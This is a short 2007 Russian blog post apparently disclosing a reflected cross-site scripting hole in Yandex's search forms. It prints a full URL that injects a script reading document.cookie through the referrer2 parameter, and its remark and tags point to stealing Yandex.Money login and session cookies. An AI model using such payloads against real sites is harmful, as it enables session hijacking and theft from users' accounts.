Суббота, 03 Февраля 2007 г. 22:53
+ в цитатник
В колонках играет - XSS на Yandex.ruXSS на Yandex.ru
партнерские программы от Яндекса - всеми известный сервис Формы для поиска. Если вставить полный HTML-код у нас - интересны переменные referrer1 и referrer2. Вот что из этого получилось:
http://www.yandex.ru/yandsearch?text=www.web-hack.ru&
referrer1=http%3A%2F%2Fwww.web-hack.ru&
referrer2=%3Cscript%3Ealert(document.cookie);%3C/script%3E
PS: в куках может содержаться логин и сессия от Яндекс.Деньг, а это уже не есть гуд...
Метки:
xss на yandex.ru
кража куков
кирдычек кошельку
-
Запись понравилась
-
0
Процитировали
-
0
Сохранили
-
